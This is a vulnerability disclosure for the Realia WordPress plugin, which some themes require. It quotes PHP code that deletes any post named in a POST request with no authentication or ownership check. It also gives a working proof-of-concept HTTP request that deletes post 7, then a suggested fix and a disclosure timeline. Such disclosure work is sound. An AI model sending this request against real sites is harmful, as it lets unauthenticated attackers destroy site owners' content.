While investigating an IDOR issue in the Home Sweet premium theme, allowing arbitrary deletion of Ads, the Realia plugin was found to be the root cause.
In fact, having this plugin installed (which some themes require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
In includes/class-realia-submission.php
add_action( 'init', array( __CLASS__, 'process_remove_form' ), 9999 );
[...]
public static function process_remove_form() {
if ( ! isset( $_POST['remove_property_form'] ) || empty( $_POST['property_id'] ) ) {
return;
}
if ( wp_delete_post( $_POST['property_id'] ) ) {
$_SESSION['messages'][] = array( 'success', __( 'Property has been successfully removed.', 'realia' ) );
} else {
$_SESSION['messages'][] = array( 'danger', __( 'An error occured when removing an item.', 'realia' ) );
}
}PoC (this will delete the Post with id 7):
POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: PoC/Realia-1.4-IDOR
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 35
property_id=7&remove_property_form=
Given that this plugin has not been updated for the last three years, other issues may be present.
Fix: It would be recommended to check that the post given belongs to the user making the request before deleting it. A CSRF check should also be done.
- June 18th, 2020 - Issue Confirmed on the Premium Theme & Escalated to Envato.
- August 5th, 2020 - Further investigations done after the lack of response from Envato revealed that the cause of the issue in the Premium theme was the free plugin Realia. Issue escalated to the WordPress plugin team.
- August 14th, 2020 - WP Plugins team investigating.
- October 15th, 2020 - No updates, the Realia plugin has also been closed from the WP repository. Disclosure.